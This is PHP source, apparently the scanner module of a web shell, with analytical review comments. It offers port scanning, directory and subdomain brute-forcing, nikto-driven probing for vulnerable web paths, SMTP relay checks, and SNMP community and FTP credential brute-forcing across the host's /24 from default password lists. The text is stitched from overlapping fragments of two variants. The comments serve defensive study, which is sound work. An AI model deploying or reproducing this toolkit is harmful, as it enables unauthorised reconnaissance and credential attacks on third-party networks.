                            echo hlinK("seC=ftpc&workingdiR=" . getcwd() . "&hosT={$ip}&useR={$user}&pasS={$pass}");
                            echo "' target='_blank'>Connect</a></b>)<br />";
                            @flush_buffers();
                        }
                    }
                }
            }
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</pre></font>";
        // Unlike the single-file variant, the cached .pj lists are deliberately left in the temp dir.
    // ---- Action 3: directory or subdomain discovery from a word list. ----
    } elseif (!empty($_REQUEST['directoryscanner'])) {
        // 'dic' is a request-supplied path read with file() — no validation; with allow_url_fopen
        // enabled file() also accepts URL wrappers. A missing file makes $dir false and count() fails.
        $dir = file($_REQUEST['dic']);
        $host = $_REQUEST['host']; // raw; used in URLs and echoed unescaped
        $r = $_REQUEST['r1']; // 1 = directories, 0 = subdomains (radio button)
        echo "<font color=#FA0><pre>Scanning started...\n";
        for ($i = 0; $i < count($dir); $i++) {
            $d = trim($dir[$i]);
            if ($r) {
                // No expected-status argument here, so whatever check_urL() treats as its default counts as found; no timeout either.
                $adr = "http://{$host}/{$d}/";
                if (check_urL($adr, 'GET')) {
                    echo "Directory Found: <a href='{$adr}' target='_blank'>{$adr}</a>\n";
                }
            } else {
                // gethostbyname() returns the name unchanged when it does not resolve.
                $adr = "{$d}.{$host}";
                $ip = gethostbyname($adr);
                if ($ip != $adr) {
                    echo "Subdomain Found: <a href='http://{$adr}' target='_blank'>{$adr}({$ip})</a>\n";
                }
            }
        }
        echo 'Done!</pre></font>';
    // ---- No action: render the three forms. ----
    } else {
        // UDP is offered only when socket_set_timeout is available; otherwise TCP is forced via a hidden field.
        // The markup strings below contain '<lable>' and a stray '</u>' closing '<ul>' — left as-is (runtime output).
        $chbox = checkfunctioN('socket_set_timeout') ? "<ul><li><input type=checkbox name=tcp value=1 checked> <lable>TCP</lable></li><li><input type=checkbox name=udp value=1 checked> <lable>UDP</lable></li></ul>" : '<input type="hidden" name="tcp" value="1">';
        // $host and $_SERVER['HTTP_HOST'] (a client-supplied header) are inserted into value attributes
        // without htmlspecialchars(). The fixed default lists and field names are a stable fingerprint of this tool.
        echo '<form name=port method="POST"><div class="fieldwrapper"><label class="styled" style="width:320px">Port scanner</label></div><div class="fieldwrapper"><label class="styled">Target:</label><div class="thefield"><input type="text" name="target" value="' . $host . '" size="30" /></div></div><div class="fieldwrapper"><label class="styled">From:</label><div class="thefield"><input type="number" min="1" max="65535" name="fromport" value="1" size="30" /></div></div><div class="fieldwrapper"><label class="styled">To:</label><div class="thefield"><input type="number" min="1" max="65535" name="toport" value="1024" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Options:</label><div class="thefield"><ul style="margin-top:0;"><li><label>Timeout:</label> <input type="number" min="1" name="timeout" size="5" value="2"></li>' . $chbox . '</u></div></div>' . $hcwd . '<div class="buttonsdiv"><input type="submit" name="portscanner" value="Scan" style="margin-left: 150px;" /></div></form><br /><form name=disc method="POST"><div class="fieldwrapper"><label class="styled" style="width:320px">Discover</label></div><div class="fieldwrapper"><label class="styled">Target:</label><div class="thefield"><input type="text" name="host" value="' . $_SERVER["HTTP_HOST"] . '" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Dictionary:</label><div class="thefield"><input type="text" name="dic" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Search for:</label><div class="thefield"><ul><li><input type=radio value=1 checked name=r1> <label>Directories</label></li><li><input type=radio name=r1 value=0> <label>Subdomains</label></li></ul></div></div>' . $hcwd . '<div class="buttonsdiv"><input type="submit" name="directoryscanner" value="Scan" style="margin-left: 150px;" /></div></form>';
        // Drop the last octet so the security-scanner defaults cover this host's /24 (.1 to .255).
        $host = substr($host, 0, strrpos($host, "."));
        $udpf = checkfunctioN('socket_set_timeout') ? '<li><input type=checkbox name=udppscanner value=1 checked onClick="document.security.udpf.disabled = !document.security.udpf.disabled;"> <label>UDP Port scanner:</label> <input name=udport type=text value="53,69,88,111,137,138,139,389,445" size="30"></li>' : '';
        echo '<form name=security method="POST"><div class="fieldwrapper"><label class="styled" style="width:320px">Security scanner</label></div><div class="fieldwrapper"><label class="styled">From:</label><div class="thefield"><input type="text" name="from" value="' . $host . '.1" size="30" /></div></div><div class="fieldwrapper"><label class="styled">To:</label><div class="thefield"><input type="text" name="to" value="' . $host . '.255" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Options:</label><div class="thefield"><ul style="margin-top:0;"><li><input type="checkbox" value="1" name="nslookup" checked> <label>NS lookup</label></li><li><label>Timeout:</label> <input type="number" min="1" name="timeout" size="5" value="2"></li><li><input type="checkbox" value="1" name="ping" checked><label>Only scan hosts with echo reply</label></li><li><input type="checkbox" value="1" name="tracert" checked><label>Traceroute</label></li><li><input type=checkbox name=tcppscanner value=1 checked onClick="document.security.port.disabled = !document.security.port.disabled;"> <label>TCP Port scanner:</label> <input name=port type=text value="21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301" size="30"></li>' . $udpf . '<li><input type=checkbox name=httpbanner value=1 checked> <label>Grab HTTP headers</label></li><li><input type=checkbox name=httpscanner value=1 checked> <label>Webserver security scanning</label></li><li><input type=checkbox name=smtprelay value=1 checked> <label>SMTP relay check</label></li>';
        // The FTP row is only rendered when the ftp extension is present (the scan branch checks via checkfunctioN()).
        if (function_exists('ftp_connect')) {
            echo '<li><input type=checkbox name=ftpscanner value=1 checked onClick="document.security.userpass.disabled = !document.security.userpass.disabled;"> <label>FTP password:</label><input name=userpass type=text value="anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]" size=30></li>';
        }
        echo '<li><input type=checkbox name=snmpscanner value=1 onClick="document.security.com.disabled = !document.security.com.disabled;" checked> <label>SNMP:</label> <input name=com type=text value="public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes" size=30></li></u></div></div>' . $hcwd . '<div class="buttonsdiv"><input type="submit" name="securityscanner" value="Scan" style="margin-left: 150px;" /></div></form>';
    }
}
             } else {
                 $url = "http://{$ip}{$page}";
                 $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                 if ($res) {
                     $output = 1;
                     echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                 }
                 flusheR();
             }
         }
     }
 }
 if (!empty($_REQUEST['smtprelay'])) {
     if (checkthisporT($ip, 25, $timeout)) {
         $res = '';
         $res = checksmtP($ip, $timeout);
         if ($res == 1) {
             echo "{$ip}) SMTP relay found.<br>";
             $output = 1;
         }
         flusheR();
     }
 }
 if (!empty($_REQUEST['snmpscanner'])) {
     if (checkthisporT($ip, 161, $timeout, 1)) {
         $com = $_REQUEST['com'];
         $coms = $res = "";
         if (strstr($com, ",")) {
             $c = explode(",", $com);
         } else {
             $c[0] = $com;
/**
 * Request handler for the scanner page: a single-host port scan, a range
 * "security scan", or (when neither was submitted) the two HTML forms.
 *
 * Every action here is driven by $_REQUEST; no authentication or authorisation
 * check is visible in this function (if one exists it must be in the caller).
 * Branches:
 *   1. portscanner   — TCP and/or UDP probe of $_REQUEST['target'] over
 *                      fromport..toport.
 *   2. securityscanner — walk $from.$f .. $from.$to and, per address, optionally
 *                      do reverse DNS, a port check, a web banner grab, URL checks
 *                      driven by a downloaded nikto database, an SMTP relay check,
 *                      an SNMP community check and FTP logins with supplied pairs.
 *   3. otherwise     — render the two forms, pre-filled from $_SERVER['SERVER_ADDR'].
 *
 * Output is echoed progressively (flusheR() after most probes). htmlspecialchars()
 * is applied at exactly two places (the port-scan banner and the "Scanning" line);
 * every other request-derived or remote-derived value ($target in the telnet href,
 * $ip, $hn, the web banner, $vuln[4], $user/$pass) is interpolated into HTML raw —
 * see the inline notes. From a host-defence viewpoint the observable behaviour of
 * this handler is sequential connects from the web-server process across a whole
 * address block, an outbound plain-http fetch of the nikto database, and repeated
 * FTP logins; that is the pattern monitoring would see.
 *
 * Globals: $hcwd (inserted verbatim into both forms; presumably a hidden-field
 * fragment — confirm in the caller). Helpers defined elsewhere in the file:
 * checkthisporT(), flusheR(), whereistmP(), namE(), downloadiT(), get_sw_namE(),
 * check_urL(), checksmtP(), snmpchecK().
 *
 * @return void  writes HTML to output; may create and delete one temp file
 */
function scanneR()
{
    global $hcwd;
    // Default target / address prefix for the forms: the server's own address
    // (set by the web server, not the request) or loopback.
    if (!empty($_SERVER["SERVER_ADDR"])) {
        $host = $_SERVER["SERVER_ADDR"];
    } else {
        $host = "127.0.0.1";
    }
    // Protocol selection for branch 1 (1 = selected).
    $udp = empty($_REQUEST['udp']) ? 0 : 1;
    $tcp = empty($_REQUEST['tcp']) ? 0 : 1;
    // --- Branch 1: single-host port scan. All five fields must be non-empty, so
    // fromport=0 or timeout=0 falls through to the next branch.
    if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
        // $target is used as given: no host/IP validation. The banner line below
        // escapes it, but the telnet:// href in the loop does not.
        $target = $_REQUEST['target'];
        $from = (int) $_REQUEST['fromport'];
        $to = (int) $_REQUEST['toport'];
        $timeout = (int) $_REQUEST['timeout'];
        // No upper bound on $to or $timeout: one request runs ($to - $from + 1)
        // probes per protocol, each presumably waiting up to $timeout seconds
        // (checkthisporT() is defined elsewhere — confirm its timeout unit).
        $nu = 0;
        echo "<font color=blue>Port scanning started against " . htmlspecialchars($target) . ":<br>";
        $start = time();
        for ($i = $from; $i <= $to; $i++) {
            if ($tcp) {
                if (checkthisporT($target, $i, $timeout)) {
                    $nu++;
                    $ser = "";
                    // Well-known service name, if the local services table has one.
                    if (getservbyport($i, "tcp")) {
                        $ser = "(" . getservbyport($i, "tcp") . ")";
                    }
                    // NOTE(review): raw $target inside the href — unescaped, unlike the banner.
                    echo "{$nu}) {$i} {$ser} (<a href=\"telnet://{$target}:{$i}\">Connect</a>) [TCP]<br>";
                }
            }
            if ($udp) {
                // 4th argument = 1 selects the UDP probe.
                if (checkthisporT($target, $i, $timeout, 1)) {
                    $nu++;
                    $ser = "";
                    if (getservbyport($i, "udp")) {
                        $ser = "(" . getservbyport($i, "udp") . ")";
                    }
                    echo "{$nu}) {$i} {$ser} [UDP]<br>";
                }
            }
            // Defined elsewhere; presumably flushes output so results stream per port — confirm.
            flusheR();
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
    } elseif (!empty($_REQUEST['securityscanner'])) {
        // --- Branch 2: range scan.
        echo "<font color=blue>";
        $start = time();
        $from = $_REQUEST['from'];
        $to = (int) $_REQUEST['to'];
        $timeout = (int) $_REQUEST['timeout'];
        // Split "a.b.c.d" at the last '.' into the first host octet ($f, kept as a
        // string) and the prefix ($from). Neither is validated: with no '.' present
        // strrpos() returns false, which the "+ 1" and substr() coerce silently into
        // a wrong split rather than an error; a non-numeric $f drives the for-loop
        // below through PHP's string-increment rules.
        $f = substr($from, strrpos($from, ".") + 1);
        $from = substr($from, 0, strrpos($from, "."));
        if (!empty($_REQUEST['httpscanner'])) {
            echo "Loading webserver bug list...";
            flusheR();
            // Temp-file path from two helpers defined elsewhere (presumably a temp
            // dir and a generated name). $buglist is set even if the download fails;
            // the cleanup at the end of this branch unlinks it regardless.
            $buglist = whereistmP() . DIRECTORY_SEPARATOR . namE();
            // The nikto check database is fetched over plain http with no integrity
            // check; its fields later build probe URLs ($vuln[1]) and are echoed into
            // this page unescaped ($vuln[4]). The '@' hides any download warning.
            $dl = @downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist);
            if ($dl) {
                // One array element per line. $file stays unset on failure, which is
                // what the "!empty($file)" guard inside the loop keys on.
                $file = file($buglist);
                echo "Done! scanning started.<br><br>";
            } else {
                echo "Failed!!! scanning started without webserver security testing...<br><br>";
            }
            flusheR();
        } else {
            // Only this line escapes $from for display; $f is interpolated raw, and
            // $ip below is built from the unescaped $from.
            $fr = htmlspecialchars($from);
            echo "Scanning {$fr}.{$f}-{$fr}.{$to}:<br><br>";
        }
        // One pass per address. $output records whether anything was printed for
        // it so a separator can be added afterwards. $i starts from the string $f.
        for ($i = $f; $i <= $to; $i++) {
            $output = 0;
            // Built from unvalidated input and echoed raw in every result line below.
            $ip = "{$from}.{$i}";
            if (!empty($_REQUEST['nslookup'])) {
                // gethostbyaddr() hands back the address unchanged when nothing
                // resolves; $hn comes from whoever controls reverse DNS for the
                // address and is echoed without escaping.
                $hn = gethostbyaddr($ip);
                if ($hn != $ip) {
                    echo "{$ip} [{$hn}]<br>";
                }
            }
            flusheR();
            if (!empty($_REQUEST['ipscanner'])) {
                // Comma-separated port list. Entries stay strings (no int cast) and
                // are passed straight to checkthisporT() and getservbyport().
                $port = $_REQUEST['port'];
                if (strstr($port, ",")) {
                    $p = explode(",", $port);
                } else {
                    $p[0] = $port;
                }
                $open = $ser = "";
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout);
                    if ($scan) {
                        $ser = "";
                        // Assignment in the condition is intentional: keep the service
                        // name only when getservbyport() returns one.
                        if ($ser = getservbyport($po, "tcp")) {
                            $ser = "({$ser})";
                        }
                        $open .= " {$po}{$ser} ";
                    }
                }
                if ($open) {
                    echo "{$ip}) Open ports:{$open}<br>";
                    $output = 1;
                }
                flusheR();
            }
            if (!empty($_REQUEST['httpbanner'])) {
                // get_sw_namE() is defined elsewhere; from its use here: falsy = no
                // banner, -1 = unknown, anything else = banner text. That text is
                // supplied by the remote host and echoed unescaped, so a scanned host
                // can inject markup into this page.
                $res = get_sw_namE($ip, $timeout);
                if ($res) {
                    echo "{$ip}) Webserver software: ";
                    if ($res == -1) {
                        // sic: output string left as-is.
                        echo "Unknow";
                    } else {
                        echo $res;
                    }
                    echo "<br>";
                    $output = 1;
                }
                flusheR();
            }
            if (!empty($_REQUEST['httpscanner'])) {
                // Only when port 80 answers and the database was actually loaded.
                if (checkthisporT($ip, 80, $timeout) && !empty($file)) {
                    // Substitution lists for the database's placeholder tokens.
                    $admin = array('/admin/', '/adm/');
                    $users = array('adm', 'bin', 'daemon', 'ftp', 'guest', 'listen', 'lp', 'mysql', 'noaccess', 'nobody', 'nobody4', 'nuucp', 'operator', 'root', 'smmsp', 'smtp', 'sshd', 'sys', 'test', 'unknown', 'uucp', 'web', 'www');
                    $nuke = array('/', '/postnuke/', '/postnuke/html/', '/modules/', '/phpBB/', '/forum/');
                    $cgi = array('/cgi.cgi/', '/webcgi/', '/cgi-914/', '/cgi-915/', '/bin/', '/cgi/', '/mpcgi/', '/cgi-bin/', '/ows-bin/', '/cgi-sys/', '/cgi-local/', '/htbin/', '/cgibin/', '/cgis/', '/scripts/', '/cgi-win/', '/fcgi-bin/', '/cgi-exe/', '/cgi-home/', '/cgi-perl/');
                    foreach ($file as $v) {
                        $vuln = array();
                        $v = trim($v);
                        // Skip blank lines and '#' comments.
                        if (!$v || $v[0] == '#') {
                            continue;
                        }
                        // Each record is a list of double-quoted fields. Turning the
                        // quote-comma-quote separators into '^' before stripping the
                        // quotes leaves commas inside a field intact. Fields used below:
                        // [1] path template, [2] and [3] handed to check_urL() (meaning
                        // not visible here), [4] description (echoed raw). A record with
                        // fewer fields is not checked for and would raise offset warnings.
                        $v = str_replace('","', '^', $v);
                        $v = str_replace('"', '', $v);
                        $vuln = explode('^', $v);
                        // All four per-placeholder variables start as the raw path; each
                        // branch below overwrites only its own.
                        $page = $cqich = $nukech = $adminch = $userch = $vuln[1];
                        // The five branches are identical apart from the placeholder token
                        // and its substitution list (a candidate for one shared loop).
                        // $url and $vuln[4] go into the page unescaped in every branch.
                        if (strstr($page, '@CGIDIRS')) {
                            foreach ($cgi as $cg) {
                                $cqich = str_replace('@CGIDIRS', $cg, $page);
                                $url = "http://{$ip}{$cqich}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                                }
                                flusheR();
                            }
                        } elseif (strstr($page, '@ADMINDIRS')) {
                            foreach ($admin as $cg) {
                                $adminch = str_replace('@ADMINDIRS', $cg, $page);
                                $url = "http://{$ip}{$adminch}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                                }
                                flusheR();
                            }
                        } elseif (strstr($page, '@USERS')) {
                            foreach ($users as $cg) {
                                $userch = str_replace('@USERS', $cg, $page);
                                $url = "http://{$ip}{$userch}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                                }
                                flusheR();
                            }
                        } elseif (strstr($page, '@NUKE')) {
                            foreach ($nuke as $cg) {
                                $nukech = str_replace('@NUKE', $cg, $page);
                                $url = "http://{$ip}{$nukech}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                                }
                                flusheR();
                            }
                        } else {
                            // No placeholder: the path is requested as-is.
                            $url = "http://{$ip}{$page}";
                            $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                            if ($res) {
                                $output = 1;
                                echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                            }
                            flusheR();
                        }
                    }
                }
            }
            if (!empty($_REQUEST['smtprelay'])) {
                if (checkthisporT($ip, 25, $timeout)) {
                    $res = '';
                    // checksmtP() is defined elsewhere; only a result loosely equal
                    // to 1 is reported.
                    $res = checksmtP($ip, $timeout);
                    if ($res == 1) {
                        echo "{$ip}) SMTP relay found.<br>";
                        $output = 1;
                    }
                    flusheR();
                }
            }
            if (!empty($_REQUEST['snmpscanner'])) {
                // UDP probe of 161 (4th arg = 1), then each community string from
                // the comma-separated 'com' field is tried via snmpchecK() (defined
                // elsewhere). Accepted strings are echoed raw.
                if (checkthisporT($ip, 161, $timeout, 1)) {
                    $com = $_REQUEST['com'];
                    $coms = $res = "";
                    if (strstr($com, ",")) {
                        $c = explode(",", $com);
                    } else {
                        $c[0] = $com;
                    }
                    foreach ($c as $v) {
                        $ret = snmpchecK($ip, $v, $timeout);
                        if ($ret) {
                            $coms .= " {$v} ";
                        }
                    }
                    if ($coms != "") {
                        echo "{$ip}) SNMP FOUND: {$coms}<br>";
                        $output = 1;
                    }
                    flusheR();
                }
            }
            if (!empty($_REQUEST['ftpscanner'])) {
                if (checkthisporT($ip, 21, $timeout)) {
                    // "user:pass" pairs; "[BLANK]" stands for an empty password. A pair
                    // with no ':' makes strpos() return false, which substr() coerces
                    // silently instead of rejecting the entry.
                    $usps = explode(',', $_REQUEST['userpass']);
                    foreach ($usps as $v) {
                        $user = substr($v, 0, strpos($v, ':'));
                        $pass = substr($v, strpos($v, ':') + 1);
                        if ($pass == '[BLANK]') {
                            $pass = '';
                        }
                        // A new connection per pair; none is ever ftp_close()d, so
                        // handles accumulate until the request ends. '@' hides
                        // connect/login warnings.
                        $ftp = @ftp_connect($ip, 21, $timeout);
                        if ($ftp) {
                            if (@ftp_login($ftp, $user, $pass)) {
                                $output = 1;
                                // $user and $pass come straight from the request and are echoed raw.
                                echo "{$ip}) FTP FOUND: ({$user}:{$pass}) <a href=\"ftp://{$ip}\" target=\"_blank\">{$ip}</a> System type: " . ftp_systype($ftp) . "<br>";
                            }
                        }
                        flusheR();
                    }
                }
            }
            // Separator after any address that produced a result line.
            if ($output) {
                echo "<hr size=1 noshade>";
            }
            flusheR();
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
        // Temp-file cleanup. $buglist is set whenever httpscanner was requested,
        // including when the download failed, so this may unlink a file that was
        // never written (a warning rather than a fatal — depends on what
        // downloadiT() creates on failure).
        if (!empty($buglist)) {
            unlink($buglist);
        }
    } else {
        // --- Branch 3: render the forms. UDP is only offered when the sockets
        // extension is loaded; otherwise TCP is forced through a hidden field.
        $chbox = extension_loaded('sockets') ? "<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP" : "<input type=hidden name=tcp value=1>";
        // $host (server-derived) and $hcwd are interpolated unquoted/unescaped.
        echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value={$host} size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">{$chbox}</td><td bgcolor=\"#808080\" align=\"right\">{$hcwd}<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
        // Drop the last octet so the range form is pre-filled with the server's own
        // a.b.c.* block.
        $host = substr($host, 0, strrpos($host, "."));
        echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value={$host}.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>{$hcwd}</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text 
value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH\$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
    }
}